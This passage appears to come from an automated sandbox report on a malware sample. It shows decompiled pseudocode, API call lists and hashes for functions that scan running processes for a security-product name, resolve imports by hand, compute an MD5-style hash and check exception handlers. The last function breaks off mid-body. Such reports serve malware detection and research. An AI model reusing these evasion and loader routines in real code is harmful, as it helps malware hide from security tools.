                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E001D7F56() {
                				char _v264;
                				void* _v300;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t17 = CreateToolhelp32Snapshot(2, 0);
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x1dd2a4; // 0x2dca5a8
                						_t2 = _t9 + 0x1dee54; // 0x73617661
                						_push( &_v264);
                						if( *0x1dd0fc() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}










                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D7F66
                • Process32First.KERNEL32(00000000,?), ref: 001D7F79
                • Process32Next.KERNEL32(00000000,?), ref: 001D7FA5
                • CloseHandle.KERNEL32(00000000), ref: 001D7FB4
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 2f6c52ae7d1472da1b3eb94620205d128cfc3c7252ffec477df0f91b0d93a1be
                • Instruction ID: b5adb058173ce8b5f559197d8436ce7dd3a983fe54ffc541125136cb56739123
                • Opcode Fuzzy Hash: 2f6c52ae7d1472da1b3eb94620205d128cfc3c7252ffec477df0f91b0d93a1be
                • Instruction Fuzzy Hash: E1F0F032206125AACB30A7769C09EFBB7ACDFC4310F000163F929C2284FB30CD8686B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E241CDD() {
                				void* _t1;
                				unsigned int _t3;
                				void* _t4;
                				long _t5;
                				void* _t6;
                				intOrPtr _t10;
                				void* _t14;
                
                				_t10 =  *0x6e244130;
                				_t1 = CreateEventA(0, 1, 0, 0);
                				 *0x6e24413c = _t1;
                				if(_t1 == 0) {
                					return GetLastError();
                				}
                				_t3 = GetVersion();
                				if(_t3 != 5) {
                					L4:
                					if(_t14 <= 0) {
                						_t4 = 0x32;
                						return _t4;
                					} else {
                						goto L5;
                					}
                				} else {
                					if(_t3 >> 8 > 0) {
                						L5:
                						 *0x6e24412c = _t3;
                						_t5 = GetCurrentProcessId();
                						 *0x6e244128 = _t5;
                						 *0x6e244130 = _t10;
                						_t6 = OpenProcess(0x10047a, 0, _t5);
                						 *0x6e244124 = _t6;
                						if(_t6 == 0) {
                							 *0x6e244124 =  *0x6e244124 | 0xffffffff;
                						}
                						return 0;
                					} else {
                						_t14 = _t3 - _t3;
                						goto L4;
                					}
                				}
                			}











                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E241243,74B063F0), ref: 6E241CEC
                • GetVersion.KERNEL32 ref: 6E241CFB
                • GetCurrentProcessId.KERNEL32 ref: 6E241D17
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E241D30
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: beebc36e4bd4571a9a9f62b8b2f06cbbe5f85eda5881f1cc7f9c5e00572af893
                • Instruction ID: 7a2e98fb073727105e6c84ef88682d32e738a18fb033aebc7586cf0b66e8f0b9
                • Opcode Fuzzy Hash: beebc36e4bd4571a9a9f62b8b2f06cbbe5f85eda5881f1cc7f9c5e00572af893
                • Instruction Fuzzy Hash: 29F081B0554B12DBEF5A7FA8EC1E7403BA3B70B712F140215E985DA1C4D3A08082CF28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E2417FA(void* __edi, intOrPtr _a4) {
                				signed int _v8;
                				intOrPtr* _v12;
                				_Unknown_base(*)()** _v16;
                				signed int _v20;
                				signed short _v24;
                				struct HINSTANCE__* _v28;
                				intOrPtr _t43;
                				intOrPtr* _t45;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t47;
                				intOrPtr* _t49;
                				intOrPtr _t50;
                				signed short _t51;
                				_Unknown_base(*)()* _t53;
                				CHAR* _t54;
                				_Unknown_base(*)()* _t55;
                				void* _t58;
                				signed int _t59;
                				_Unknown_base(*)()* _t60;
                				intOrPtr _t61;
                				intOrPtr _t65;
                				signed int _t68;
                				void* _t69;
                				CHAR* _t71;
                				signed short* _t73;
                
                				_t69 = __edi;
                				_v20 = _v20 & 0x00000000;
                				_t59 =  *0x6e244140;
                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                				if(_t43 != 0) {
                					_t45 = _t43 + __edi;
                					_v12 = _t45;
                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                					if(_t46 != 0) {
                						while(1) {
                							_t71 = _t46 + _t69;
                							_t47 = LoadLibraryA(_t71);
                							_v28 = _t47;
                							if(_t47 == 0) {
                								break;
                							}
                							_v24 = _v24 & 0x00000000;
                							 *_t71 = _t59 - 0x63699bc3;
                							_t49 = _v12;
                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                							_t50 =  *_t49;
                							if(_t50 != 0) {
                								L6:
                								_t73 = _t50 + _t69;
                								_v16 = _t61 + _t69;
                								while(1) {
                									_t51 =  *_t73;
                									if(_t51 == 0) {
                										break;
                									}
                									if(__eflags < 0) {
                										__eflags = _t51 - _t69;
                										if(_t51 < _t69) {
                											L12:
                											_t21 =  &_v8;
                											 *_t21 = _v8 & 0x00000000;
                											__eflags =  *_t21;
                											_v24 =  *_t73 & 0x0000ffff;
                										} else {
                											_t65 = _a4;
                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                												goto L12;
                											} else {
                												goto L11;
                											}
                										}
                									} else {
                										_t51 = _t51 + _t69;
                										L11:
                										_v8 = _t51;
                									}
                									_t53 = _v8;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										_t54 = _v24 & 0x0000ffff;
                									} else {
                										_t54 = _t53 + 2;
                									}
                									_t55 = GetProcAddress(_v28, _t54);
                									__eflags = _t55;
                									if(__eflags == 0) {
                										_v20 = _t59 - 0x63699b44;
                									} else {
                										_t68 = _v8;
                										__eflags = _t68;
                										if(_t68 != 0) {
                											 *_t68 = _t59 - 0x63699bc3;
                										}
                										 *_v16 = _t55;
                										_t58 = 0x725990f8 + _t59 * 4;
                										_t73 = _t73 + _t58;
                										_t32 =  &_v16;
                										 *_t32 = _v16 + _t58;
                										__eflags =  *_t32;
                										continue;
                									}
                									goto L23;
                								}
                							} else {
                								_t50 = _t61;
                								if(_t61 != 0) {
                									goto L6;
                								}
                							}
                							L23:
                							_v12 = _v12 + 0x14;
                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                							if(_t46 != 0) {
                								continue;
                							} else {
                							}
                							L26:
                							goto L27;
                						}
                						_t60 = _t59 + 0x9c9664bb;
                						__eflags = _t60;
                						_v20 = _t60;
                						goto L26;
                					}
                				}
                				L27:
                				return _v20;
                			}

                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E241832
                • GetProcAddress.KERNEL32(?,00000000), ref: 6E2418A4
                Memory Dump Source
                • Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true
                • Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 82db91fc4bce5312230c92eb6a6128654570c1b24c4eb849fda85a083a1bac97
                • Instruction ID: 2029e26d564abdf1a17111f061f9f8e8cac17cff2998304b1914aa3d175c5bd3
                • Opcode Fuzzy Hash: 82db91fc4bce5312230c92eb6a6128654570c1b24c4eb849fda85a083a1bac97
                • Instruction Fuzzy Hash: 42315C71E1020FDFEB08CF99C884AAEB7F6BF04341B2040A9D811E7240E770DA98CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E001D1B6A(void* __ecx, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				void _v76;
                				intOrPtr* _t226;
                				signed int _t229;
                				signed int _t231;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t243;
                				signed int _t245;
                				signed int _t247;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t255;
                				signed int _t257;
                				signed int _t259;
                				signed int _t338;
                				signed char* _t348;
                				signed int _t349;
                				signed int _t351;
                				signed int _t353;
                				signed int _t355;
                				signed int _t357;
                				signed int _t359;
                				signed int _t361;
                				signed int _t363;
                				signed int _t365;
                				signed int _t367;
                				signed int _t376;
                				signed int _t378;
                				signed int _t380;
                				signed int _t382;
                				signed int _t384;
                				intOrPtr* _t400;
                				signed int* _t401;
                				signed int _t402;
                				signed int _t404;
                				signed int _t406;
                				signed int _t408;
                				signed int _t410;
                				signed int _t412;
                				signed int _t414;
                				signed int _t416;
                				signed int _t418;
                				signed int _t420;
                				signed int _t422;
                				signed int _t424;
                				signed int _t432;
                				signed int _t434;
                				signed int _t436;
                				signed int _t438;
                				signed int _t440;
                				signed int _t508;
                				signed int _t599;
                				signed int _t607;
                				signed int _t613;
                				signed int _t679;
                				void* _t682;
                				signed int _t683;
                				signed int _t685;
                				signed int _t690;
                				signed int _t692;
                				signed int _t697;
                				signed int _t699;
                				signed int _t718;
                				signed int _t720;
                				signed int _t722;
                				signed int _t724;
                				signed int _t726;
                				signed int _t728;
                				signed int _t734;
                				signed int _t740;
                				signed int _t742;
                				signed int _t744;
                				signed int _t746;
                				signed int _t748;
                
                				_t226 = _a4;
                				_t348 = __ecx + 2;
                				_t401 =  &_v76;
                				_t682 = 0x10;
                				do {
                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                					_t401 =  &(_t401[1]);
                					_t348 =  &(_t348[4]);
                					_t682 = _t682 - 1;
                				} while (_t682 != 0);
                				_t6 = _t226 + 4; // 0x14eb3fc3
                				_t683 =  *_t6;
                				_t7 = _t226 + 8; // 0x8d08458b
                				_t402 =  *_t7;
                				_t8 = _t226 + 0xc; // 0x56c1184c
                				_t349 =  *_t8;
                				asm("rol eax, 0x7");
                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                				asm("rol ecx, 0xc");
                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                				asm("ror edx, 0xf");
                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                				asm("ror esi, 0xa");
                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                				_v8 = _t685;
                				_t690 = _v8;
                				asm("rol eax, 0x7");
                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                				asm("rol ecx, 0xc");
                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                				asm("ror edx, 0xf");
                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                				asm("ror esi, 0xa");
                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                				_v8 = _t692;
                				_t697 = _v8;
                				asm("rol eax, 0x7");
                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                				asm("rol ecx, 0xc");
                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                				asm("ror edx, 0xf");
                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                				asm("ror esi, 0xa");
                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                				_v8 = _t699;
                				asm("rol eax, 0x7");
                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                				asm("rol ecx, 0xc");
                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                				_t508 =  !_t357;
                				asm("ror edx, 0xf");
                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                				_v12 = _t410;
                				_v12 =  !_v12;
                				asm("ror esi, 0xa");
                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                				asm("rol eax, 0x5");
                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                				asm("rol ecx, 0x9");
                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                				asm("rol edx, 0xe");
                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                				asm("ror esi, 0xc");
                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                				asm("rol eax, 0x5");
                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                				asm("rol ecx, 0x9");
                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                				asm("rol edx, 0xe");
                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                				asm("ror esi, 0xc");
                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                				asm("rol eax, 0x5");
                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                				asm("rol ecx, 0x9");
                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                				asm("rol edx, 0xe");
                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                				asm("ror esi, 0xc");
                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                				asm("rol eax, 0x5");
                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                				asm("rol ecx, 0x9");
                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                				asm("rol edx, 0xe");
                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                				asm("ror esi, 0xc");
                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                				asm("rol eax, 0x4");
                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                				asm("rol ecx, 0xb");
                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                				asm("rol edx, 0x10");
                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                				_t599 = _t367 ^ _t420;
                				asm("ror esi, 0x9");
                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                				asm("rol eax, 0x4");
                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                				asm("rol edi, 0xb");
                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                				asm("rol edx, 0x10");
                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                				_t338 = _t607 ^ _t422;
                				asm("ror ecx, 0x9");
                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                				asm("rol eax, 0x4");
                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                				asm("rol esi, 0xb");
                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                				asm("rol edi, 0x10");
                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                				_t424 = _t734 ^ _t613;
                				asm("ror ecx, 0x9");
                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                				asm("rol eax, 0x4");
                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                				asm("rol edx, 0xb");
                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                				asm("rol esi, 0x10");
                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                				asm("ror ecx, 0x9");
                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                				asm("rol eax, 0x6");
                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                				asm("rol edx, 0xa");
                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                				asm("rol esi, 0xf");
                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                				asm("ror ecx, 0xb");
                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                				asm("rol eax, 0x6");
                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                				asm("rol edx, 0xa");
                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                				asm("rol esi, 0xf");
                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                				asm("ror ecx, 0xb");
                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                				asm("rol eax, 0x6");
                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                				asm("rol edx, 0xa");
                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                				asm("rol esi, 0xf");
                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                				asm("ror edi, 0xb");
                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                				asm("rol eax, 0x6");
                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                				asm("rol edx, 0xa");
                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                				_t400 = _a4;
                				asm("rol esi, 0xf");
                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                				 *_t400 =  *_t400 + _t259;
                				asm("ror eax, 0xb");
                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                				return memset( &_v76, 0, 0x40);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 1ecd0f12299eb9d0803f691a3c12a2792b72d9f55958800bd631e02db9d83322
                • Instruction ID: 1997cb3f2827cd76269e35d59b5b4f5d521de884dc67b78ccc0287a482dfa6af
                • Opcode Fuzzy Hash: 1ecd0f12299eb9d0803f691a3c12a2792b72d9f55958800bd631e02db9d83322
                • Instruction Fuzzy Hash: 7C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6E2423A5(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x6e244178;
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x6e2441c0 = 1;
                										__eflags =  *0x6e2441c0;
                										if( *0x6e2441c0 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x6e244178;
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x6e2441c0 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x6e244178 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x6e244180 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x6e24417c + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x6e2441c0 = 1;
                							__eflags =  *0x6e2441c0;
                							if( *0x6e2441c0 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x6e2441c0 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x6e244180 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t58 = _t81 - 1;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x6e244178 = _t81;
                								}
                								_t58 = _t81 - 1;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
